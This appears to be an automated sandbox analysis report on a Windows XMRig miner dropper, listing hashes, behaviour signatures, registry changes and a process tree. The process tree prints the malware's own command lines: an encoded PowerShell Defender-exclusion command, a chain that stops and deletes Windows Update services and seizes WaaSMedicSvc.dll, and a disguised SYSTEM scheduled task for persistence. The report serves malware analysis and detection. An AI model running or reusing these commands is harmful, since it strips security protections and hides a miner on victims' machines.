Analysis
- max time kernel: 299s
- max time network: 249s
- platform: windows10_x64
- resource: win10-20220414-en
- submitted: 15-05-2022 22:15

Static task: static1
Behavioral task: behavioral1
Sample: a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
Resource: win7-20220414-en

General
- Target: a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
- Size: 7.6MB
- MD5: 95104aa61ed30687c13e5c644d5722f3
- SHA1: f9788f808044d448f73203d93da0021cefb781ff
- SHA256: a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
- SHA512: 99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce

Malware Config

Signatures
Modifies security service (2 TTPs, 5 IoCs)
Processes (description / ioc / process):
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
-
XMRig Miner Payload (5 IoCs)
Processes (resource / yara_rule):
- behavioral2/memory/4744-399-0x000000014036DB84-mapping.dmp: xmrig
- behavioral2/memory/4744-398-0x0000000140000000-0x0000000140803000-memory.dmp: xmrig
- behavioral2/memory/4744-400-0x0000000140000000-0x0000000140803000-memory.dmp: xmrig
- behavioral2/memory/4744-401-0x0000000140000000-0x0000000140803000-memory.dmp: xmrig
- behavioral2/memory/4744-404-0x0000000140000000-0x0000000140803000-memory.dmp: xmrig
-
Executes dropped EXE (1 IoCs)
Processes (pid / process):
- 3164 services.exe
-
Possible privilege escalation attempt (4 IoCs)
Processes (pid / process):
- 4228 icacls.exe
- 4852 takeown.exe
- 5016 icacls.exe
- 4188 takeown.exe
-
Stops running service(s) (3 TTPs)
-
Modifies file permissions (1 TTPs, 4 IoCs)
Processes (pid / process):
- 4852 takeown.exe
- 5016 icacls.exe
- 4188 takeown.exe
- 4228 icacls.exe
-
Drops file in System32 directory (3 IoCs)
Processes (description / ioc / process):
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log (conhost.exe)
-
Suspicious use of SetThreadContext (2 IoCs)
Processes (description / pid / process / target process):
- PID 4428 set thread context of 4472: 4428 conhost.exe, target conhost.exe
- PID 4428 set thread context of 4744: 4428 conhost.exe, target svchost.exe
-
Drops file in Program Files directory (3 IoCs)
Processes (description / ioc / process):
- File created: C:\Program Files\Windows\services.exe (conhost.exe)
- File opened for modification: C:\Program Files\Windows\services.exe (conhost.exe)
- File created: C:\Program Files\Google\Libs\WR64.sys (conhost.exe)
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS (52 IoCs)
Processes (description / ioc / process):
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (conhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (conhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (conhost.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (conhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (conhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
-
Modifies registry key (1 TTPs, 18 IoCs)
Processes (pid / process):
- 4848 reg.exe
- 4264 reg.exe
- 4772 reg.exe
- 4808 reg.exe
- 3908 reg.exe
- 3624 reg.exe
- 4140 reg.exe
- 4200 reg.exe
- 4820 reg.exe
- 4064 reg.exe
- 2536 reg.exe
- 3896 reg.exe
- 4728 reg.exe
- 4068 reg.exe
- 5084 reg.exe
- 4792 reg.exe
- 3092 reg.exe
- 3364 reg.exe
-
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes (pid / process; repeated entries collapsed with their count):
- 4692 powershell.exe (3 entries)
- 4652 conhost.exe (1 entry)
- 588 powershell.exe (3 entries)
- 4428 conhost.exe (1 entry)
- 4744 svchost.exe (the remaining 56 entries)
-
Suspicious behavior: LoadsDriver (1 IoCs)
Processes (pid / process):
- 628
-
Suspicious use of AdjustPrivilegeToken (41 IoCs)
Processes (description / pid / process):
- Token: SeDebugPrivilege 4692 powershell.exe
- Token: SeIncreaseQuotaPrivilege 4692 powershell.exe
- Token: SeSecurityPrivilege 4692 powershell.exe
- Token: SeTakeOwnershipPrivilege 4692 powershell.exe
- Token: SeLoadDriverPrivilege 4692 powershell.exe
- Token: SeSystemProfilePrivilege 4692 powershell.exe
- Token: SeSystemtimePrivilege 4692 powershell.exe
- Token: SeProfSingleProcessPrivilege 4692 powershell.exe
- Token: SeIncBasePriorityPrivilege 4692 powershell.exe
- Token: SeCreatePagefilePrivilege 4692 powershell.exe
- Token: SeBackupPrivilege 4692 powershell.exe
- Token: SeRestorePrivilege 4692 powershell.exe
- Token: SeShutdownPrivilege 4692 powershell.exe
- Token: SeDebugPrivilege 4692 powershell.exe
- Token: SeSystemEnvironmentPrivilege 4692 powershell.exe
- Token: SeRemoteShutdownPrivilege 4692 powershell.exe
- Token: SeUndockPrivilege 4692 powershell.exe
- Token: SeManageVolumePrivilege 4692 powershell.exe
- Token: 33 4692 powershell.exe
- Token: 34 4692 powershell.exe
- Token: 35 4692 powershell.exe
- Token: 36 4692 powershell.exe
- Token: SeDebugPrivilege 4652 conhost.exe
- Token: SeTakeOwnershipPrivilege 4852 takeown.exe
- Token: SeDebugPrivilege 588 powershell.exe
- Token: SeAssignPrimaryTokenPrivilege 588 powershell.exe
- Token: SeIncreaseQuotaPrivilege 588 powershell.exe
- Token: SeSecurityPrivilege 588 powershell.exe
- Token: SeTakeOwnershipPrivilege 588 powershell.exe
- Token: SeLoadDriverPrivilege 588 powershell.exe
- Token: SeSystemtimePrivilege 588 powershell.exe
- Token: SeBackupPrivilege 588 powershell.exe
- Token: SeRestorePrivilege 588 powershell.exe
- Token: SeShutdownPrivilege 588 powershell.exe
- Token: SeSystemEnvironmentPrivilege 588 powershell.exe
- Token: SeUndockPrivilege 588 powershell.exe
- Token: SeManageVolumePrivilege 588 powershell.exe
- Token: SeDebugPrivilege 4428 conhost.exe
- Token: SeTakeOwnershipPrivilege 4188 takeown.exe
- Token: SeLockMemoryPrivilege 4744 svchost.exe
- Token: SeLockMemoryPrivilege 4744 svchost.exe
-
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (description / pid / process / target process; repeated entries collapsed with their count):
- PID 3960 a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe wrote to memory of 4652 conhost.exe (3 entries)
- PID 4652 conhost.exe wrote to memory of 2536 cmd.exe (2 entries)
- PID 2536 cmd.exe wrote to memory of 4692 powershell.exe (2 entries)
- PID 4652 conhost.exe wrote to memory of 2644 cmd.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4112 sc.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4184 sc.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 1624 sc.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4796 sc.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4800 sc.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4140 reg.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4068 reg.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4200 reg.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4728 reg.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 3624 reg.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4852 takeown.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 5016 icacls.exe (2 entries)
- PID 4652 conhost.exe wrote to memory of 1776 cmd.exe (2 entries)
- PID 1776 cmd.exe wrote to memory of 4724 schtasks.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4064 reg.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4848 reg.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 3092 conhost.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 3364 reg.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4452 schtasks.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 3808 schtasks.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4988 schtasks.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4860 schtasks.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4580 schtasks.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4832 schtasks.exe (2 entries)
- PID 2644 cmd.exe wrote to memory of 4268 schtasks.exe (2 entries)
- PID 4652 conhost.exe wrote to memory of 3140 cmd.exe (2 entries)
- PID 3140 cmd.exe wrote to memory of 3844 schtasks.exe (2 entries)
- PID 3164 services.exe wrote to memory of 4428 conhost.exe (1 entry)
Processes
(Process tree; the number in brackets is the depth reported for each process, children are indented under their parent. Each entry gives the image path, the command line, and the signatures attributed to that process.)

[1] C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\conhost.exe
      Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
        (the UTF-16LE base64 decodes to: <#eauc#> Add-MpPreference <#dh#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#yro#> -Force <#ajfa#>, a Windows Defender exclusion for the user profile and the system drive)
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\schtasks.exe
          Command line: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
          - Creates scheduled task(s)
    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          - Modifies registry key
    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\schtasks.exe
          Command line: schtasks /run /tn "GoogleUpdateTaskMachineQC"

[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
    - Modifies registry key
[1] C:\Windows\system32\takeown.exe
    Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\icacls.exe
    Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
    - Possible privilege escalation attempt
    - Modifies file permissions
[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
    - Modifies registry key
[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
    - Modifies security service
    - Modifies registry key
[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
    - Modifies registry key
[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
    - Modifies registry key
[1] C:\Windows\system32\sc.exe
    Command line: sc stop dosvc
[1] C:\Windows\system32\sc.exe
    Command line: sc stop bits
[1] C:\Windows\system32\sc.exe
    Command line: sc stop wuauserv
[1] C:\Windows\system32\sc.exe
    Command line: sc stop WaaSMedicSvc
[1] C:\Windows\system32\sc.exe
    Command line: sc stop UsoSvc

[1] C:\Program Files\Windows\services.exe
    Command line: "C:\Program Files\Windows\services.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\conhost.exe
      Command line: "C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
      - Drops file in System32 directory
      - Suspicious use of SetThreadContext
      - Drops file in Program Files directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
        (same encoded Add-MpPreference exclusion command as above)
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
          - Drops file in System32 directory
          - Modifies data under HKEY_USERS
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      [4] C:\Windows\system32\sc.exe
          Command line: sc stop bits
      [4] C:\Windows\system32\takeown.exe
          Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          - Possible privilege escalation attempt
          - Modifies file permissions
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\icacls.exe
          Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
